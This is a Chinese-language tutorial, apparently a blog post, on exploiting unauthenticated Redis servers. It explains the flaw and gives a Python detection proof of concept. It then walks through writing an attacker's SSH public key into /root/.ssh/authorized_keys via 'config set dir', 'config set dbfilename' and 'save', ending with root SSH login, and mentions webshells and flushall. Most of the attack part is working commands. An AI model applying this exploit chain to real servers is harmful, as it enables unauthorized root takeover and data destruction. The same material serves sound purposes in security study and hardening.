Redis未授权漏洞

Redis_百度百科 (baidu.com)

redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set –有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。区别的是redis会周期性的把更新的数据写入磁盘或者把修改操作写入追加的记录文件,并且在此基础上实现了master-slave(主从)同步。

Redis 是一个高性能的key-value数据库。 redis的出现,很大程度补偿了memcached这类key/value存储的不足,在部 分场合可以对关系数据库起到很好的补充作用。它提供了Java,C/C++,C#,PHP,JavaScript,Perl,Object-C,Python,Ruby,Erlang等客户端,使用很方便。 [1]

Redis支持主从同步。数据可以从主服务器向任意数量的从服务器上同步,从服务器可以是关联其他从服务器的主服务器。这使得Redis可执行单层树复制。存盘可以有意无意的对数据进行写操作。由于完全实现了发布/订阅机制,使得从数据库在任何地方同步树时,可订阅一个频道并接收主服务器完整的消息发布记录。同步对读取操作的可扩展性和数据冗余很有帮助。

漏洞原理

Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以使用对应私钥直接使用ssh服务登录目标服务器、添加计划任务、写入Webshell等操作。

漏洞利用方式及条件

漏洞产生条件

1.redis绑定在 0.0.0.0:6379,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网。

2.没有设置密码认证(默认为空),可以免密码远程登录redis服务。

文件写入原理

因为redis-cli远程连接redis之后,除了可以查看内存中的键值对外还可以通过config set dir xxxconfig set dbfilename xxx等命令,在权限足够的情况下可以实现在任意路径写入任意内容。如果将dbfilename指定到web网站的某个目录下通过写入特定内容 生成webshell,如果将dbfilename指定为ssh公钥存放的目录,这样就产生了ssh远程登录的漏洞.

漏洞危害

1.攻击者无需认证访问到内部数据,可能导致敏感信息泄露,黑客也可以恶意执行flushall来清空所有数据;

2.攻击者可通过EVAL执行lua代码,或通过数据备份功能往磁盘写入后门文件(webshell);

3.最严重的情况,如果Redis以root身份运行,黑客可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器

webshell利用前提

1.靶机redis连接未授权,在攻击机上能用redis-cli连上,并未登陆验证或者弱密码验证

2.开启了web服务,且知道网站路径

ssh登陆利用前提

redis以root权限运行

反弹shell利用前提

权限足够

验证提权

poc验证脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import socket


def redis_access(target_ip: str, port: int):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
payload = "\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a"
try:
sock.connect((target_ip, port))
sock.send(payload.encode())
response = sock.recv(1024).decode()
if 'redis_version' in response:
return True
else:
return False
except Exception as e:
return False


redis_access('x.x.x.x', 6379)

redis-cli安装及使用

Centos7.6安装演示:

1.下载redis-cli

1
wget http://download.redis.io/redis-stable.tar.gz

image-20220909133558226

2.解压缩

1
tar -zxvf redis-stable.tar.gz

image-20220909133617040

3.简易配置并加全局生效

1
2
3
cd redis-stable
make //全局生效
cp src/redis-cli /usr/bin/

image-20220909134100500

4.redis-cli使用

image-20220909134205217

redis-cli

-h 指定host

-p 指定端口号

x 从标准输入中读取数据并且作为redis-cli的最后一个参数

1
redis-cli -h 127.0.0.1 -p 6379

config

config get dir 获取redis用于文件持久化存储的路径

config get dbfilename 获取redis用于文件持久化存储的文件名

config set dir xxxx 修改路径

config set dbfilename xxx 修改文件名

1
2
3
4
5
6
127.0.0.1:6379> config get dir
1) "dir"
2) "/data"
127.0.0.1:6379> config get dbfilename
1) "dbfilename"
2) "dump.rmb"

save

1
2
3
4
5
6
7
8
9
10
11
redis的数据是可以进行持久化存储的 有rdb持久化(默认)和aof持久化两种方式
=========================================================
redis与持久化存储有关的配置
save 900 1 # 900s内有一个键值对被修改则自动持久化存储
save 300 10
save 60 10000

dbfilename dump.rmb # 默认持久化存储的文件名
dir /home/redis/data/ # 默认持久化存储的路径
==========================================================
因为需要满足以上的条件才能自动持久化,这里的save命令是直接手动持久化内存中的数据

通过写入SSH公钥实现ssh登录

在本地生成ssh公钥
1
2
cd /root/.ssh
ssh-keygen -t rsa

image-20220909135511739

将公钥写入 某个文件
1
(echo -e"\n";cat id_rsa.pub;echo -e "\n")>xx.txt

image-20220909135605053

xx.txt的内容作为值写入到check键中
1
cat xx.txt | redis-cli -h ip地址 -p 6379 -x set check

image-20220909135854908

连接redis
1
redis-cli -h ip地址 -p 6379 

如果是默认端口的话 后面可以不跟-p

image-20220909141250563

提权
1
2
3
4
5
config get dir #查看目录
config set dir /root/.ssh #更改redis备份路径为ssh公钥存放目录
config set dbfilename authorized_keys #设置上传公钥的备份文件名字为authorized_keys
save #保存
exit #退出

image-20220909141546264

SSH登录验证
1
ssh -i id_rsa root@ip地址

image-20220909142501602

image-20220909142612040

ok,拿到root权限,就不上cs了。

今日份的实战结束。